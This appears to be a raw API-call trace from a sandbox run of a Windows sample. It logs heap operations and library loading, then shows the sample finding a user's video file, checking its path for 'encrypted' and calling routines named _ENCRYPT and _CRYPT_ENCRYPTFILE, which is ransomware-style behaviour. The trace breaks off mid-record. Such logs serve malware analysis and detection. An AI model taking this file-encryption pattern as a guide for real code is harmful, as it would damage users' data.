0x7c2080 [0043.223] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0043.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0043.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.223] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0043.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.224] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb38 [0043.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cb38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0043.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.224] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0043.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0043.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.224] CloseHandle (hObject=0x128) returned 1 [0043.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0043.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0043.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0043.225] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.225] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.225] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.226] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0043.226] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.226] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0043.226] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0043.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.226] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.226] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.226] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.226] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa178d950, ftCreationTime.dwHighDateTime=0x1d5c0ab, ftLastAccessTime.dwLowDateTime=0x22ef5700, ftLastAccessTime.dwHighDateTime=0x1d5c284, ftLastWriteTime.dwLowDateTime=0x22ef5700, ftLastWriteTime.dwHighDateTime=0x1d5c284, nFileSizeHigh=0x0, nFileSizeLow=0x1dee, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Myt71e.flv", cAlternateFileName="")) returned 0x7c20c0 [0043.226] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.226] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.226] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa178d950, ftCreationTime.dwHighDateTime=0x1d5c0ab, ftLastAccessTime.dwLowDateTime=0x22ef5700, ftLastAccessTime.dwHighDateTime=0x1d5c284, ftLastWriteTime.dwLowDateTime=0x22ef5700, ftLastWriteTime.dwHighDateTime=0x1d5c284, nFileSizeHigh=0x0, nFileSizeLow=0x1dee, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Myt71e.flv", cAlternateFileName="")) returned 0x7c20c0 [0043.226] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.227] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Myt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yt71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t71e.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.228] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.228] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0043.228] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.228] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.228] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.229] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.229] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.229] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.229] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.229] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa178d950, ftCreationTime.dwHighDateTime=0x1d5c0ab, ftLastAccessTime.dwLowDateTime=0x22ef5700, ftLastAccessTime.dwHighDateTime=0x1d5c284, 